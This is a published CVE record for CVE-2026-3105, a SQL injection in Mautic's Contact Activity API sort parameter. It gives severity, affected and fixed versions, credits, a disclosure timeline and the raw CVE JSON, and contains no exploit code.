CVE-2026-3105 (GCVE-0-2026-3105)

Vulnerability from cvelistv5 – Published: 2026-02-24 18:39 – Updated: 2026-02-24 18:39
VLAI?
Title
SQL Injection in Contact Activity API Sorting
Summary
SummaryThis advisory addresses a SQL injection vulnerability in the API endpoint used for retrieving contact activities. A vulnerability exists in the query construction for the Contact Activity timeline where the parameter responsible for determining the sort direction was not strictly validated against an allowlist, potentially allowing authenticated users to inject arbitrary SQL commands via the API. MitigationPlease update to 4.4.19, 5.2.10, 6.0.8, 7.0.1 or later. WorkaroundsNone. ReferencesIf you have any questions or comments about this advisory: Email us at security@mautic.org
Severity ?
7.6 (High)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L
CWE
  • CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Assigner
References
Impacted products
Vendor Product Version
Mautic Mautic Affected: >= 2.10.0 , < < 4.4.19 <5.2.10 <6.0.8 <7.0.1 (semver)
Create a notification for this product.
Credits
q1uf3ng parykgruszka escopecz Leuchtfeuer Digital Marketing
Show details on NVD website
To clipboard 

{
  "containers": {
    "cna": {
      "affected": [
        {
          "collectionURL": "https://packagist.org",
          "defaultStatus": "unaffected",
          "packageName": "mautic/core",
          "product": "Mautic",
          "repo": "https://github.com/mautic/mautic",
          "vendor": "Mautic",
          "versions": [
            {
              "lessThan": "\u003c 4.4.19 \u003c5.2.10 \u003c6.0.8 \u003c7.0.1",
              "status": "affected",
              "version": "\u003e= 2.10.0",
              "versionType": "semver"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "reporter",
          "value": "q1uf3ng"
        },
        {
          "lang": "en",
          "type": "remediation developer",
          "value": "parykgruszka"
        },
        {
          "lang": "en",
          "type": "remediation reviewer",
          "value": "escopecz"
        },
        {
          "lang": "en",
          "type": "sponsor",
          "value": "Leuchtfeuer Digital Marketing"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003ch3\u003eSummary\u003c/h3\u003e\u003cp\u003eThis advisory addresses a SQL injection vulnerability in the API endpoint used for retrieving contact activities. A vulnerability exists in the query construction for the Contact Activity timeline where the parameter responsible for determining the sort direction was not strictly validated against an allowlist, potentially allowing authenticated users to inject arbitrary SQL commands via the API.\u003c/p\u003e\u003ch3\u003eMitigation\u003c/h3\u003e\u003cp\u003ePlease update to \u003cstrong\u003e4.4.19\u003c/strong\u003e, \u003cstrong\u003e5.2.10\u003c/strong\u003e, \u003cstrong\u003e6.0.8\u003c/strong\u003e, \u003cstrong\u003e7.0.1\u003c/strong\u003e\u0026nbsp;or later.\u003c/p\u003e\u003ch3\u003eWorkarounds\u003c/h3\u003e\u003cp\u003eNone.\u003c/p\u003e\u003ch3\u003eReferences\u003c/h3\u003e\u003cp\u003eIf you have any questions or comments about this advisory:\u003c/p\u003e\u003cp\u003eEmail us at \u003ca target=\"_blank\" rel=\"nofollow\"\u003esecurity@mautic.org\u003c/a\u003e\u003c/p\u003e\u003cbr\u003e"
            }
          ],
          "value": "SummaryThis advisory addresses a SQL injection vulnerability in the API endpoint used for retrieving contact activities. A vulnerability exists in the query construction for the Contact Activity timeline where the parameter responsible for determining the sort direction was not strictly validated against an allowlist, potentially allowing authenticated users to inject arbitrary SQL commands via the API.\n\nMitigationPlease update to 4.4.19, 5.2.10, 6.0.8, 7.0.1\u00a0or later.\n\nWorkaroundsNone.\n\nReferencesIf you have any questions or comments about this advisory:\n\nEmail us at security@mautic.org"
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-66",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-66 SQL Injection"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 7.6,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-89",
              "description": "CWE-89 Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-02-24T18:39:03.352Z",
        "orgId": "4e531c38-7a33-45d3-98dd-d909c0d8852e",
        "shortName": "Mautic"
      },
      "references": [
        {
          "url": "https://github.com/mautic/mautic/security/advisories/GHSA-r5j5-q42h-fc93"
        }
      ],
      "source": {
        "advisory": "GHSA-r5j5-q42h-fc93",
        "discovery": "EXTERNAL"
      },
      "timeline": [
        {
          "lang": "en",
          "time": "2026-02-15T13:38:00.000Z",
          "value": "Report received"
        },
        {
          "lang": "en",
          "time": "2026-02-18T09:27:00.000Z",
          "value": "Report accepted"
        },
        {
          "lang": "en",
          "time": "2026-02-24T14:55:00.000Z",
          "value": "Advisory published"
        }
      ],
      "title": "SQL Injection in Contact Activity API Sorting",
      "x_generator": {
        "engine": "Vulnogram 0.5.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "4e531c38-7a33-45d3-98dd-d909c0d8852e",
    "assignerShortName": "Mautic",
    "cveId": "CVE-2026-3105",
    "datePublished": "2026-02-24T18:39:03.352Z",
    "dateReserved": "2026-02-24T10:36:40.356Z",
    "dateUpdated": "2026-02-24T18:39:03.352Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.